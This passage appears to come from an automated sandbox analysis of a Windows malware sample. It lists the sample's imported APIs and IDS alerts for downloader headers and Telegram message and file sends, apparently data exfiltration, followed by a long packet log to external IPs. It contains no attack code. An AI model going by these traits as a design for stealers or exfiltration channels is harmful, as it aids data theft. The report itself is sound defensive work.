                                                                                                                  RT_GROUP_ICON0xfe1340x14dataEnglishGreat Britain1.25
                                                                                                                  RT_VERSION0xfe1480xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                  RT_MANIFEST0xfe2240x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                  UxTheme.dllIsThemeActive
                                                                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                                                  Possible Origin

                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishGreat Britain

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2025-01-10T20:37:43.004704+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649710132.226.247.7380TCP
                                                                                                                  2025-01-10T20:37:43.973459+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649710132.226.247.7380TCP
                                                                                                                  2025-01-10T20:37:44.567549+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649712104.21.112.1443TCP
                                                                                                                  2025-01-10T20:37:45.301557+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649714132.226.247.7380TCP
                                                                                                                  2025-01-10T20:37:45.923744+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649715104.21.112.1443TCP
                                                                                                                  2025-01-10T20:37:54.985464+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.649787149.154.167.220443TCP
                                                                                                                  2025-01-10T20:38:01.291299+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.649830149.154.167.220443TCP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 10, 2025 20:37:41.975191116 CET4971080192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:41.980026960 CET8049710132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:41.980118036 CET4971080192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:41.980315924 CET4971080192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:41.985094070 CET8049710132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:42.740592957 CET8049710132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:42.744561911 CET4971080192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:42.749521971 CET8049710132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:42.958389997 CET8049710132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:43.004703999 CET4971080192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:43.006278038 CET49711443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:43.006323099 CET44349711104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:43.006395102 CET49711443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:43.014946938 CET49711443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:43.014971972 CET44349711104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:43.515481949 CET44349711104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:43.515613079 CET49711443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:43.520729065 CET49711443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:43.520739079 CET44349711104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:43.521050930 CET44349711104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:43.567152977 CET49711443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:43.572674990 CET49711443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:43.615334034 CET44349711104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:43.691633940 CET44349711104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:43.691698074 CET44349711104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:43.691781044 CET49711443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:43.698657990 CET49711443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:43.702404976 CET4971080192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:43.707252979 CET8049710132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:43.917732000 CET8049710132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:43.920006037 CET49712443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:43.920053005 CET44349712104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:43.920120001 CET49712443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:43.920393944 CET49712443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:43.920408964 CET44349712104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:43.973459005 CET4971080192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:44.397768974 CET44349712104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:44.400316000 CET49712443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:44.400372982 CET44349712104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:44.567576885 CET44349712104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:44.567643881 CET44349712104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:44.567697048 CET49712443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:44.568384886 CET49712443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:44.571739912 CET4971080192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:44.572899103 CET4971480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:44.576843023 CET8049710132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:44.576922894 CET4971080192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:44.577743053 CET8049714132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:44.577830076 CET4971480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:44.578048944 CET4971480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:44.582863092 CET8049714132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:45.253782988 CET8049714132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:45.255435944 CET49715443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:45.255486965 CET44349715104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:45.255547047 CET49715443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:45.255846977 CET49715443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:45.255858898 CET44349715104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:45.301557064 CET4971480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:45.753170013 CET44349715104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:45.754930019 CET49715443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:45.754962921 CET44349715104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:45.923747063 CET44349715104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:45.923809052 CET44349715104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:45.923898935 CET49715443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:45.924295902 CET49715443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:45.929053068 CET4972180192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:45.933898926 CET8049721132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:45.933976889 CET4972180192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:45.934077024 CET4972180192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:45.938870907 CET8049721132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:46.777050972 CET8049721132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:46.778824091 CET49727443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:46.778867960 CET44349727104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:46.778955936 CET49727443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:46.779333115 CET49727443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:46.779345036 CET44349727104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:46.817177057 CET4972180192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:47.233092070 CET44349727104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:47.235757113 CET49727443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:47.235791922 CET44349727104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:47.369427919 CET44349727104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:47.369498014 CET44349727104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:47.369575024 CET49727443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:47.370121002 CET49727443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:47.374044895 CET4972180192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:47.374634981 CET4973380192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:47.379271030 CET8049721132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:47.379339933 CET4972180192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:47.379388094 CET8049733132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:47.379471064 CET4973380192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:47.379661083 CET4973380192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:47.384375095 CET8049733132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:48.083070040 CET8049733132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:48.084465027 CET49739443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:48.084506989 CET44349739104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:48.084602118 CET49739443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:48.084857941 CET49739443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:48.084873915 CET44349739104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:48.129658937 CET4973380192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:48.545070887 CET44349739104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:48.546646118 CET49739443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:48.546664953 CET44349739104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:48.714903116 CET44349739104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:48.714962006 CET44349739104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:48.715048075 CET49739443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:48.715594053 CET49739443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:48.718874931 CET4973380192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:48.720139027 CET4974480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:48.724081993 CET8049733132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:48.724132061 CET4973380192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:48.724951982 CET8049744132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:48.725032091 CET4974480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:48.725141048 CET4974480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:48.729866982 CET8049744132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:49.419161081 CET8049744132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:49.420516014 CET49750443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:49.420567036 CET44349750104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:49.420639992 CET49750443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:49.421010971 CET49750443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:49.421024084 CET44349750104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:49.464437962 CET4974480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:49.901447058 CET44349750104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:49.903245926 CET49750443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:49.903285980 CET44349750104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:50.050651073 CET44349750104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:50.050700903 CET44349750104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:50.050745964 CET49750443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:50.051192045 CET49750443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:50.055866003 CET4974480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:50.056441069 CET4975280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:50.060977936 CET8049744132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:50.061023951 CET4974480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:50.061244965 CET8049752132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:50.061304092 CET4975280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:50.061391115 CET4975280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:50.066145897 CET8049752132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:50.861355066 CET8049752132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:50.862911940 CET49758443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:50.862976074 CET44349758104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:50.863074064 CET49758443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:50.863369942 CET49758443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:50.863389969 CET44349758104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:50.910914898 CET4975280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:51.333025932 CET44349758104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:51.334790945 CET49758443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:51.334821939 CET44349758104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:51.468414068 CET44349758104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:51.468483925 CET44349758104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:51.468547106 CET49758443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:51.469043970 CET49758443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:51.472289085 CET4975280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:51.473263979 CET4976480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:51.477298975 CET8049752132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:51.477395058 CET4975280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:51.478070021 CET8049764132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:51.478144884 CET4976480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:51.478260040 CET4976480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:51.483043909 CET8049764132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.150430918 CET8049764132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.151958942 CET49770443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:52.152004004 CET44349770104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.152092934 CET49770443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:52.152390957 CET49770443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:52.152405024 CET44349770104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.192238092 CET4976480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:52.621220112 CET44349770104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.622936964 CET49770443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:52.622973919 CET44349770104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.752660036 CET44349770104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.752871037 CET44349770104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.752948999 CET49770443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:52.753345013 CET49770443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:52.756431103 CET4976480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:52.757625103 CET4977680192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:52.761544943 CET8049764132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.761622906 CET4976480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:52.762444973 CET8049776132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.762511969 CET4977680192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:52.762599945 CET4977680192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:52.767330885 CET8049776132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:53.454581976 CET8049776132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:53.455905914 CET49782443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:53.455944061 CET44349782104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:53.456012964 CET49782443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:53.456252098 CET49782443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:53.456263065 CET44349782104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:53.504580975 CET4977680192.168.2.6132.226.247.73
